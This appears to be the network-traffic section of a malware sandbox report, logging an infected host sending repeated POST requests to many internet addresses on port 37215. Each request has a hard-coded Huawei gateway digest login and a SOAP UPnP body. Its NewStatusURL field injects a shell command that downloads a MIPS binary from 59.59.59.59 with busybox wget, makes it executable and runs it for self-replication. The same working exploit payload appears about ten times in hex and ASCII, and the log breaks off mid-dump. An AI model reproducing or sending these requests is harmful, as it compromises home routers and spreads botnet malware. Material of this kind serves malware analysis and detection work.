                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1275192.168.2.1533396157.240.138.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809618950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1276192.168.2.155139441.58.139.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809654951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1277192.168.2.155173041.89.37.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809672117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1278192.168.2.154761057.78.27.22737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809724092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1279192.168.2.1558790189.223.134.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809765100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1280192.168.2.155067441.211.241.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809793949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1281192.168.2.1539942157.206.124.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809823990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1282192.168.2.1552694197.33.63.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809962988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1283192.168.2.1555906197.179.211.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809995890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1284192.168.2.154959688.105.37.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810086012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 